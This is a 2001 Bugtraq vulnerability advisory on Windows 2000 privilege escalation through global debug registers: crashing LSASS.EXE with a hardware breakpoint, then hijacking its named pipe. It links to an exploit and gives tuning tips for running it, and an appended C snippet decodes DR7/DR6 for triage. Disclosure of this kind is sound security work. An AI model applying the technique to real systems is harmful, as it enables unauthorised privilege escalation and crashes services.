[20752] in bugtraq

Elevation of privileges with debug registers on Win2K

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Thu May 24 12:56:00 2001

Message-ID: <3B0D0B96.39E2B92A@guninski.com>
Date: Thu, 24 May 2001 16:24:38 +0300
From: Georgi Guninski <guninski@guninski.com>
To: Bugtraq <BUGTRAQ@securityfocus.com>

Georgi Guninski security advisory #45, 2001

Elevation of privileges with debug registers on Win2K

Systems affected:
Win2K, Win2K SP1
I have not tested on Win2K SP2, but according to Microsoft SP2 fixes this.

Risk: High
Date: 24 May 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Georgi Guninski. 
You may distribute it unmodified. 
You may not modify it and distribute it or distribute parts 
of it without the author's written permission.

Disclaimer:
The information in this advisory is believed to be true based on 
experiments though it may be false.
The opinions expressed in this advisory and program are my own and 
not of any company. The usual standard disclaimer applies, 
especially the fact that Georgi Guninski is not liable for any damages 
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no 
responsibility for content or misuse of this advisory or program or 
any derivatives thereof.


Description:

If someone can execute programs on a target Win2K system, then he may
elevate his privileges at least to an extent that gives him write access
to C:\WINNT\SYSTEM32 and HKCR.


Details:
The problem is that the x86 debug registers DR0-7 are global for all processes,
so setting a hardware breakpoint in one process affects other processes and
services. If the hardware breakpoint is hit in a service, an unhandled
single step exception occurs and the process/service is terminated.
After the service is terminated it is possible to hijack its trusted named
pipes, and when another service writes to the named pipe it is possible to
impersonate the service.
In my exploit pipe3.cpp, LSASS.EXE is killed with the help of a hardware breakpoint
and then \\.\pipe\lsass is hijacked.

Simple test for debug registers: Start debugging CALC.EXE with windbg.
Set a hardware breakpoint on memory write to the current value of ESP.
Start taskmgr.exe and wait some time.
If you start receiving Single Step exceptions with dialog boxes and/or BSOD
in processes other than CALC.EXE then there is a vulnerability.

Notes on using pipe3.cpp:
pipe3.cpp is kind of ugly but works on all the boxes I have tested.
It takes 2 arguments - <pid of LSASS.EXE> and <ESP in LSASS.EXE>.
Build and start pipe3. Wait some time. The expected result is to get an
exception in LSASS.EXE, and then it must be terminated. Then after some time
the console is locked and the machine is rebooted. A file is created in
c:\winnt\system32 and a key in HKCR.
If LSASS.EXE is not terminated, stop and restart pipe3.
If nothing happens you may need to play with the parameter MAGICESPINLSA -
this is the ESP in a thread in LSASS.EXE.
If you get a BSOD then you need more playing with the parameter and/or Sleep().

Workaround: According to Microsoft SP2 fixes this though I have not verified it
personally.

Demonstration:
http://www.guninski.com/pipe3.cpp

Vendor status:
Microsoft was informed on 20 May 2001.

Regards,
Georgi Guninski
http://www.guninski.com
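
For triage of the failure mode described under Details (a service dying on a single step exception it never asked for), the following added example, which is not part of the advisory or of pipe3.cpp, decodes DR7 and DR6 values read from a thread context or crash dump to show which hardware breakpoint slot is armed and which one fired. The bit layout is the documented x86 one; the function names and the sample register values are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* One decoded breakpoint slot (DR0..DR3) as described by DR7. */
struct hwbp {
    int enabled;         /* local (Ln) or global (Gn) enable bit set */
    int is_global;       /* Gn set: survives hardware task switches */
    const char *access;  /* R/Wn field: what kind of access traps */
    int length;          /* LENn field: watched size in bytes */
};

/* x86 DR7 layout: bits 2n and 2n+1 are Ln/Gn; bits 16+4n..17+4n are R/Wn;
   bits 18+4n..19+4n are LENn. "io" applies only with CR4.DE set, and
   LEN=10b means 8 bytes only on CPUs that support it. */
struct hwbp decode_dr7_slot(uint32_t dr7, int n)
{
    static const char *rw_name[4] = { "execute", "write", "io", "read/write" };
    static const int len_bytes[4] = { 1, 2, 8, 4 };
    struct hwbp b;
    b.enabled   = ((dr7 >> (2 * n)) & 3u) != 0;
    b.is_global = (dr7 >> (2 * n + 1)) & 1u;
    b.access    = rw_name[(dr7 >> (16 + 4 * n)) & 3u];
    b.length    = len_bytes[(dr7 >> (18 + 4 * n)) & 3u];
    return b;
}

/* DR6 status: B0..B3 (bits 0-3) name the slot that fired; BS (bit 14) is a
   genuine single step. Returns 0..3, -1 for BS only, -2 if neither is set. */
int dr6_cause(uint32_t dr6)
{
    for (int n = 0; n < 4; n++)
        if (dr6 & (1u << n))
            return n;
    return (dr6 & (1u << 14)) ? -1 : -2;
}

int main(void)
{
    /* Constructed sample values (not from a real dump): slot 0 armed for a
       4-byte write watch, and DR6 reporting that slot 0 fired. */
    uint32_t dr7 = 0x000D0401u, dr6 = 0xFFFF0FF1u;
    for (int n = 0; n < 4; n++) {
        struct hwbp b = decode_dr7_slot(dr7, n);
        if (b.enabled)
            printf("DR%d armed: %s, %d byte(s), %s\n", n, b.access, b.length,
                   b.is_global ? "global" : "local");
    }
    printf("DR6 cause: %d\n", dr6_cause(dr6));
    return 0;
}
```

In a process that was never under a debugger, an armed slot in DR7 together with a B0-B3 bit in DR6 indicates a breakpoint set elsewhere, which is the condition the CALC.EXE test above looks for.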

